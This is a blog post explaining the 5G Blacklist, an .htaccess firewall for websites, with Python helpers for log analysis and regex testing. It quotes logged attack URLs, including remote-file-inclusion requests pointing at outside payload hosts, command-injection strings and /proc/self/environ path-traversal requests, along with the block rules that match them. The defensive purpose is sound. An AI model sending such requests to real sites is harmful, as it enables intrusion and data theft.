Building the 5G Blacklist
Protecting your website is more important than ever. There are a million ways to do it, and this is one of them. In fact, it’s what I use to protect Perishable Press and other key sites. It’s called the 5G Blacklist, and it’s something I’ve been working on for a long time. The idea is simple enough: analyze bad requests and block them using a firewall/blacklist via .htaccess. Now in its 5th generation, the 5G Blacklist has evolved into a solid method of keeping your site safe and secure. How does it work? I’m glad you asked.
What “normal” site traffic looks like
I’m no expert in traffic analysis, security, or anything else for that matter, but I love to study error logs, and I love even more to stop bad guys from spamming, cracking, and exploiting my site. Gots to keep it safe and secure, and a great way to do that is to understand what’s happening behind the scenes on your server.
“Normal” site traffic involves all sorts of requests and a variety of legitimate responses. Ideally, all URL requests for your site’s resources will return a favorable 200 OK status code: a user requests something from your site, and the server is able to locate the resource and send it back. Hopefully you’re getting plenty of 200 OK responses, but that’s not the only thing happening on your server.
Normally you’re also going to see lots of other status codes, depending on how well (or badly) you’ve got things configured. Here are some examples of hopefully less-common things happening on your server:
- 301 Moved Permanently – resource moved and redirected permanently
- 302 Found – resource moved and redirected temporarily
- 400 Bad Request – server does not understand request
- 401 Unauthorized – resource is protected, request not authorized
- 403 Forbidden – server refuses to return the requested resource
- 404 Not Found – server can’t find the requested resource
- 410 Gone – requested resource is no longer available
- 500 Internal Server Error – something is screwed up with the server
...and so on, with all sorts of other responses, typically in smaller volumes. Even a cursory glance through your access/error logs will reveal plenty of this kind of server activity. Normal traffic includes a wide variety of these responses, in proportions that vary depending on your setup.
Relative proportion of top server responses for Perishable Press
The above diagram isn’t scientific, but it’s a good representation of the relative amounts of different types of traffic on the server. There are actually way more 200 OK responses happening, but I didn’t want the graphic to be 7000px tall. Hopefully the idea is clear: you should be getting mostly 200-level responses, along with a reasonable number of other responses.
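If you want to check the proportions on your own server, a few lines of script can tally the status codes in an access log. This is a minimal Python sketch, not something the 5G depends on. It assumes Apache’s Common or Combined Log Format, and the sample log lines and the helper names `status_counts` and `status_classes` are hypothetical.

```python
import re
from collections import Counter

# Assumes Apache's Common/Combined Log Format, for example:
# 203.0.113.5 - - [10/Feb/2011:13:55:36 -0700] "GET / HTTP/1.1" 200 2326
# Captures the method and URI of the quoted request line, then the status code.
LOG_LINE = re.compile(r'"(?P<method>\S+) (?P<uri>\S+)[^"]*" (?P<status>\d{3}) ')


def status_counts(lines):
    """Tally responses per status code; lines that don't parse are skipped."""
    counts = Counter()
    for line in lines:
        match = LOG_LINE.search(line)
        if match:
            counts[match.group("status")] += 1
    return counts


def status_classes(counts):
    """Roll individual codes up into 2xx/3xx/4xx/5xx buckets."""
    classes = Counter()
    for status, n in counts.items():
        classes[status[0] + "xx"] += n
    return classes


if __name__ == "__main__":
    # Hypothetical sample lines; in practice, read them from your own access log.
    sample = [
        '203.0.113.5 - - [10/Feb/2011:13:55:36 -0700] "GET / HTTP/1.1" 200 2326 "-" "Mozilla/5.0"',
        '203.0.113.5 - - [10/Feb/2011:13:55:37 -0700] "GET /style.css HTTP/1.1" 200 512 "-" "Mozilla/5.0"',
        '198.51.100.7 - - [10/Feb/2011:13:56:01 -0700] "GET /old-page HTTP/1.1" 301 240 "-" "Mozilla/5.0"',
        '192.0.2.44 - - [10/Feb/2011:13:57:12 -0700] "GET /x/1337/url HTTP/1.1" 404 210 "-" "-"',
        '192.0.2.44 - - [10/Feb/2011:13:57:13 -0700] "GET /a.css( HTTP/1.1" 403 199 "-" "-"',
    ]
    counts = status_counts(sample)
    print(counts.most_common())
    print(status_classes(counts))
```

On a site running a blacklist, you would expect the 4xx bucket to show a noticeable share of 403s alongside the 404s.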
What “bad” traffic looks like
Notice in the above diagram that there are quite a few 403 and 404 errors. This is primarily due to the way I have things set up with the 5G Blacklist and other security measures. I probably spend way too much time tracking down and resolving 404s, which otherwise would be much more prevalent. The real key here is the relatively high volume of 403 responses, which is due to the 5G Firewall/Blacklist. Without it installed, the traffic pattern might look more like this:
How traffic might look without the 5G Blacklist
Without the 5G in place, there would be way more 404 errors and not nearly as many 403 errors. Why is this? It has to do with what the bad guys are doing when they hit your site, and how the 5G Blacklist works to block the bad stuff and keep your site safe. In general, it goes something like this:
- Bad guys use a script to scan your website for vulnerabilities
- The script requests anywhere from a few to thousands of different URLs
- Virtually all of these malicious requests are targeting non-existent resources using weird-looking, abnormal URLs
- The server can’t find any of these weird requests, so it sends back the default 404 response (most often)
- As evil scripts continue to scan your site, they waste your server’s precious resources: memory, bandwidth, et al.
- The more this happens, the more 404 errors are recorded in your error & access logs
In small volumes, as seen with typical traffic patterns, the default 404 response is perfectly fine, even helpful. If something doesn’t exist, that’s the clearest way of communicating the information. But these days, websites are being targeted and scanned almost constantly, and it seems to get worse every day. The problem with doing nothing and just rolling with the default 404 responses is that it leaves the door open to further exploits should a malicious scan actually find a weakness. For example:
- Evil script scans your site and finds a hole at, say, http://example.com/some/crazy/1337/*%*/url
- The server would normally return a 404 Not Found response, but won’t if the request can be met (i.e., exploit opportunity)
- This allows the attacker to exploit the hole found via the requested URL
And even if the server responds with a 404, there is nothing stopping the attack script from requesting similarly structured URLs. So instead of a single 404 and done, malicious scans may continue freely requesting variations on the target URL, for example:
http://example.com/some/crazy/1337/*%*/url
http://example.com/another/crazy/1337/*%*/url
http://example.com/some/crazy/s0-1337/*%*()/url
http://example.com/some/crazy/1337/*%*/url?url=http://blahblah..
http://example.com/something/even/crazier/1337/*%*()/url?payload=
In my experience, it’s better to stop these requests as soon as possible, denying bad guys the chance to scan whatever they want ad nauseam. The key to doing this is understanding what’s happening on your server. Armed with that information, securing your site is a matter of analyzing server logs, matching malicious request patterns, and testing everything until your eyes glaze over and the migraine kicks in...
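The “matching and testing” part can be sketched as scoring each candidate pattern by how many logged bad URLs it catches versus how many legitimate URLs it would wrongly block. This is a minimal Python illustration, not part of the 5G itself. The bad URLs are the variations listed above, while the good URLs, the candidate patterns, and the `score_pattern` helper are hypothetical.

```python
import re


def score_pattern(pattern, bad_urls, good_urls):
    """Return (bad URLs matched, good URLs matched) for a candidate regex.

    re.IGNORECASE mirrors the [NC] flag used in the 5G rules in this article.
    """
    rx = re.compile(pattern, re.IGNORECASE)
    hits = sum(1 for url in bad_urls if rx.search(url))
    false_positives = sum(1 for url in good_urls if rx.search(url))
    return hits, false_positives


# The logged variations from above.
BAD = [
    "http://example.com/some/crazy/1337/*%*/url",
    "http://example.com/another/crazy/1337/*%*/url",
    "http://example.com/some/crazy/s0-1337/*%*()/url",
    "http://example.com/some/crazy/1337/*%*/url?url=http://blahblah..",
    "http://example.com/something/even/crazier/1337/*%*()/url?payload=",
]

# Hypothetical legitimate URLs; in practice, pull these from your own logs.
GOOD = [
    "http://example.com/press/2011/02/01/building-the-5g-blacklist/",
    "http://example.com/?s=htaccess",
    "http://example.com/wp-content/themes/example/style.css",
]

if __name__ == "__main__":
    for candidate in ("crazy", r"\?", r"\*%\*"):
        hits, fps = score_pattern(candidate, BAD, GOOD)
        print(f"{candidate!r}: {hits}/{len(BAD)} bad blocked, {fps}/{len(GOOD)} good blocked")
```

Running it shows the trade-off. “crazy” misses the crazier variant (4 of 5). \? blocks only the two URLs that have query strings and also catches the legitimate search (2 of 5, 1 false positive). \*%\* catches all five without touching the good URLs.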
Or you can let someone else do it.
Building the 5G Blacklist
First of all, here’s how the 5G Blacklist works:
- Include the blacklist code in your site’s root .htaccess file
- Apache executes the .htaccess directives for each URL request
- The 5G Blacklist blocks requests that include matching strings of evil garbage
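To make those steps concrete, here is a toy Python model of the per-request check. It only mimics the logic: split the URL, test the path and the query string against patterns, and forbid the request on any match. It is not how Apache works internally, and the `is_blocked` name is hypothetical. The three patterns are the ones discussed later in this article, and the full 5G includes more rules than these.

```python
import re
from urllib.parse import urlsplit

# Toy model of the per-request check; Apache does not work like this internally.
# Path patterns play the role of RedirectMatch (tested against the URL path);
# query patterns play the role of RewriteCond %{QUERY_STRING} ... [NC].
PATH_PATTERNS = [re.compile(r"\.css\(")]
QUERY_PATTERNS = [
    re.compile(r"(environ|localhost|mosconfig|scanner)", re.IGNORECASE),
    re.compile(r"\.\./", re.IGNORECASE),
]


def is_blocked(url):
    """True if the request would get a 403 Forbidden from these patterns."""
    parts = urlsplit(url)  # no percent-decoding is done here (a simplification)
    if any(p.search(parts.path) for p in PATH_PATTERNS):
        return True
    # Any single match is enough, as with a chain of [OR] conditions.
    return any(p.search(parts.query) for p in QUERY_PATTERNS)


if __name__ == "__main__":
    for url in (
        "http://example.com/ip-detection-bad-seo/).css(",
        "http://example.com/include.pcchess.php?mosConfig_absolute_path=%7Cecho",
        "http://example.com/comment.php?blog=../../../../proc/self/environ%00",
        "http://example.com/press/2006/01/10/stupid-htaccess-tricks/",
    ):
        print("403 Forbidden" if is_blocked(url) else "passed through", url)
```

Requests that pass are simply handed on to the site, which may still answer with 200, 404, or anything else.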
That’s actually how just about any blacklist/firewall works. There are other ways to protect your site against malicious requests, but handling them at the server level with .htaccess (or the httpd.conf file) is better for performance than, say, using PHP to connect to the database, or using a WordPress plugin or similar. It’s also easier to install and manage: literally copy, paste, upload, and test. No configuring or editing required. When it’s time to update, just replace it with the latest version. The trick is finding a current blacklist that’s been well tested.
Evolution of the 5G
To see what it is, let’s look at where it’s been:
- Ultimate htaccess Blacklist (Compressed Version)
- 2G Blacklist: Closing the Door on Malicious Attacks
- Perishable Press 3G Blacklist
- The Perishable Press 4G Blacklist
- 5G Firewall (Beta)
Along the way, I’ve explored a wide variety of different blacklist techniques. The 5G is the culmination of all these efforts, and will eventually be replaced by the imminent 6G Blacklist/Firewall. Currently the beta release is the latest version of the blacklist, and the official/final 5G will be posted soon.
Specific examples
Now let’s look at some specific examples of what we’re blocking with the 5G. I won’t go into as much depth as I did when explaining how I built the 4G Blacklist, but I’ll try to cover a good variety of specific examples. Reading through should give you a solid understanding of how blacklists work in general, and a good overview of what the 5G does to help protect your site.
The simple .css(
We’ll start with one of the most common types of malicious request: those that include the “.css(” character string. Here are some examples:
http://example.com/ip-detection-bad-seo/).css(
http://example.com/ip-detection-bad-seo/);f=e.css(
http://example.com/ip-detection-bad-seo/);this.elem.style.display=a:this.options.display;if(c.css(this.elem,
http://example.com/ip-detection-bad-seo/+b]):f===v.css(e,d):this.css(d,typeof%20f===
Notice the common pattern in these idiot requests: .css(. Instead of trying to block the user-agent or IP address for thousands of these requests, it’s more efficient to identify the best common pattern and block any matches. Here is a simple .htaccess directive that blocks all of these silly requests:
RedirectMatch 403 \.css\(
...but that’s some strong medicine, possibly interfering with legitimate requests. So you need to find a balance between effective matching and the number of false positives. We’ll see an example of this just ahead. For now, notice how that single rule effectively blocks the endless stream of “.css(”-type malicious requests.
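A quick way to sanity-check a pattern before uploading it is to run it against the logged URLs. The Python sketch below applies the same \.css\( regex to the four examples. RedirectMatch is tested against the URL path rather than the query string, so the sketch searches only the path. The `matches_css_rule` name and the two non-matching test URLs are hypothetical.

```python
import re
from urllib.parse import urlsplit

# Same regex as the RedirectMatch directive above.
CSS_CALL = re.compile(r"\.css\(")


def matches_css_rule(url):
    """True if the URL path contains ".css(".

    RedirectMatch is tested against the URL path, not the query string,
    so only the path component is searched here.
    """
    return CSS_CALL.search(urlsplit(url).path) is not None


LOGGED = [
    "http://example.com/ip-detection-bad-seo/).css(",
    "http://example.com/ip-detection-bad-seo/);f=e.css(",
    "http://example.com/ip-detection-bad-seo/);this.elem.style.display=a:this.options.display;if(c.css(this.elem,",
    "http://example.com/ip-detection-bad-seo/+b]):f===v.css(e,d):this.css(d,typeof%20f===",
]

if __name__ == "__main__":
    print(all(matches_css_rule(u) for u in LOGGED))
    # An ordinary stylesheet request has no "(" and is left alone.
    print(matches_css_rule("http://example.com/wp-content/themes/example/style.css"))
```

Because the escaped parenthesis is required, plain stylesheet requests such as style.css are not caught. A ".css(" that appears only in the query string would also slip past this particular directive.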
The ubiquitous mosConfig_absolute_path
Another commonly seen malicious scan targets various URLs containing the character string “mosConfig_absolute_path”. Most often, this is included in the query-string part of the URL, as seen in this fistful of examples:
http://example.com/include.pcchess.php?mosConfig_absolute_path=%7Cecho%20%22Origins%22;echo%20%22scanner%22;%7C
http://example.com/videodb.class.xml.php?mosConfig_absolute_path=%7Cecho%20%22Origins%22;echo%20%22scanner%22;%7C
http://example.com/components/com_sitemap/sitemap.xml.php?mosConfig_absolute_path=%7Cecho%20%22Origins%22;echo%20%22scanner%22;%7C
http://example.com/components/com_sitemap/sitemap.xml.php?mosConfig_absolute_path=http://youregypt.com/id/Ckrid1.txt??
http://example.com/components/com_sitemap/sitemap.xml.php?mosConfig_absolute_path=%7Cecho%20%22Origins%22;echo%20%22scanner%22;%7C
http://example.com/components/com_sitemap/sitemap.xml.php?mosConfig_absolute_path=http://youregypt.com/id/Ckrid1.txt??
http://example.com/components/com_moodle/moodle.php?mosConfig_absolute_path=http://www.fileden.com/files/2011/1/27/3068675//fx29id1.txt??
Again, you could spend a lifetime trying to block these requests by IP or user-agent, but it’s way easier and more efficient to simply block the most effective common pattern, which the 5G does with this rule:
RewriteCond %{QUERY_STRING} (environ|localhost|mosconfig|scanner) [NC,OR]
This powerful directive also blocks several other strings. Because the pattern is unanchored and the [NC] (no case) flag makes it case-insensitive, it matches any query string that contains mosconfig, such as the mosConfig_absolute_path seen in the example URLs. This is why it’s important to construct your .htaccess rules carefully: many malicious requests target known software, and in doing so they include legitimate variables and parameters in the scanned URLs. The 5G is fine-tuned primarily for WordPress sites, so blocking requests for the mosConfig_ pattern is no problem. However, mosConfig_ is an actual part of Joomla, Mambo, and possibly others, so on sites running those platforms this rule could block legitimate requests.
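The same kind of check works for the query-string condition. In this Python sketch, re.IGNORECASE stands in for the [NC] flag, and only the query string (the part after “?”) is searched, as with %{QUERY_STRING}. The `query_matches` name and the two site-search URLs are hypothetical. The search containing “scanner” shows how an unanchored alternation can also catch an innocent request, which is the balance problem described above.

```python
import re
from urllib.parse import urlsplit

# Same alternation as the RewriteCond; re.IGNORECASE stands in for [NC].
QUERY_RULE = re.compile(r"(environ|localhost|mosconfig|scanner)", re.IGNORECASE)


def query_matches(url):
    """True if the query string (the part after "?") matches the condition."""
    return QUERY_RULE.search(urlsplit(url).query) is not None


if __name__ == "__main__":
    checks = [
        # Logged scans from above: these should match.
        "http://example.com/include.pcchess.php?mosConfig_absolute_path=%7Cecho%20%22Origins%22;echo%20%22scanner%22;%7C",
        "http://example.com/components/com_sitemap/sitemap.xml.php?mosConfig_absolute_path=http://youregypt.com/id/Ckrid1.txt??",
        # Hypothetical site searches: the second one is an innocent false positive.
        "http://example.com/?s=htaccess",
        "http://example.com/?s=barcode+scanner",
    ]
    for url in checks:
        print(query_matches(url), url)
```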
Directory path to heaven
How high can you go? That’s the question some malicious scripts are asking your server about its directory structure. Here’s a rather violent sequence of recursive-directory requests that hit my site recently:
http://example.com/press/2006/01/10/stupid-htaccess-tricks/index.php?ref=../../../../../../../../../../../../../../../../../../../proc/self/environ
http://example.com/press/2006/01/10/stupid-htaccess-tricks/index.php?ref=../../../../../../../../../../../../../../../../../../../proc/self/environ
http://example.com/comment.php?blog=../../../../../../../../../../../../../../../../../../../../../../../..//proc/self/environ%00
http://example.com/press/2009/12/01/stupid-wordpress-tricks/comment.php?blog=../../../../../../../../../../../../../../../../../../../../../../../..//proc/self/environ%00
http://example.com/components/com_extcalendar/admin_events.php?CONFIG_EXTLANGUAGES_DIR=../../../../../../../../../../../../../../../../../../../../../../../..//proc/self/environ%0000
http://example.com/components/com_extcalendar/admin_events.php?CONFIG_EXTLANGUAGES_DIR=../../../../../../../../../../../../../../../../../../../../../../../..//proc/self/environ%0000
http://example.com/dompdf/dompdf.php?input_file=http://www.ourl.in/1???
http://example.com/press/2006/01/10/index.php?ref=....//....//....//....//....//....//....//....//....//....//....//proc/self/environ%0000
http://example.com/press/2006/01/10/index.php?ref=../../../../../../../../../../../../../../../../../../../proc/self/environ%00
http://example.com/press/2006/01/10/index.php?ref=/proc/self/environ
Of course, the common denominator for this type of request is “../”, which as far as I know is never present in legitimate URI requests. Typically the recursive directory string is included in the query string, so we can use mod_rewrite’s QUERY_STRING variable to block this type of malicious request. The 5G uses the following rule to do the job:
RewriteCond %{QUERY_STRING} \.\./ [NC,OR]
And just for fun, here’s an infographic that attempts to visualize what’s happening on the server for this type of recursive directory traversal request:
A sort of virtual Inception
Don’t worry if that’s just confusing – it’s mostly hypothetical. The take-home message here is that you can block this type of evil request quite easily, with a single line of code.
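Here is that single line checked in Python against some of the logged requests. Like the RewriteCond, the sketch searches only the query string, and the `has_traversal` name is hypothetical. The “....//” variant still contains “../”, so it is caught. The last logged request (ref=/proc/self/environ) has no “../” at all, so this condition alone misses it. That request would instead match the environ alternative in the mosConfig rule.

```python
import re
from urllib.parse import urlsplit

# Same regex as the RewriteCond; [NC] makes no difference for dots and slashes.
TRAVERSAL = re.compile(r"\.\./")


def has_traversal(url):
    """True if the query string contains "../"."""
    return TRAVERSAL.search(urlsplit(url).query) is not None


if __name__ == "__main__":
    for url in (
        "http://example.com/comment.php?blog=../../../../../../../../../../../../../../../../../../../../../../../..//proc/self/environ%00",
        "http://example.com/press/2006/01/10/index.php?ref=....//....//....//....//....//....//....//....//....//....//....//proc/self/environ%0000",
        "http://example.com/press/2006/01/10/index.php?ref=/proc/self/environ",
    ):
        print(has_traversal(url), url)
```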
Summary
Long posts deserve good summaries. Or something. Here’s a quick recap of the key points in this article:
- Websites are constantly scanned/attacked by malicious scripts
- Constant scanning and spamming wastes bandwidth and resources
- Decreased server performance negatively impacts your site’s ranking and success
- It is possible to block a majority of malicious requests
- The 5G Blacklist is one way of protecting your website
- The 5G uses regular expressions to block bad requests
- These expressions match evil character strings in the URL
- Include the 5G in your site’s root .htaccess file
- Upload to your server, test thoroughly, and you’re done
I hope this article is informative and useful. If you have questions or suggestions please share them in the comments. Thanks :)
20 responses to “Building the 5G Blacklist”
The blacklist is great; personally, I use PHPIDS and mod_security for bad bots/exploits, etc.
Your site does a great job educating people, many of whom don’t really know how this stuff works, and the tools targeting WordPress are growing every day.
For example, just in the last hour, here is what was blocked on one of my sites in terms of bad requests; you can see some are lame bots but others are specific to WordPress.
http://pastebin.com/N9K4mBeZ
Just wanted to let you know that your Blacklist is working well with Drupal 7 in a multi-site configuration and many modules to include Boost and FileCache installed. I just removed:
RewriteEngine On
RewriteBase /
Those lines are already declared by Drupal and for the Boost module.
Awesome – Thanks for reporting that :)
Your blacklists are very appreciated by the community!! Keep up the great work!
Anyone convert these rewrite rules to IIS 7.5 URL Redirects? I’m going to try.
Looks like Google Page Speed returns a 403 when using the 5G.
Blocking legit services isn’t unusual with these types of anti-spam services, Conor. Bad Behavior is the same: http://bad-behavior.ioerror.us/
It’s an issue you have to be aware of as you toss up the pros and cons for such a script.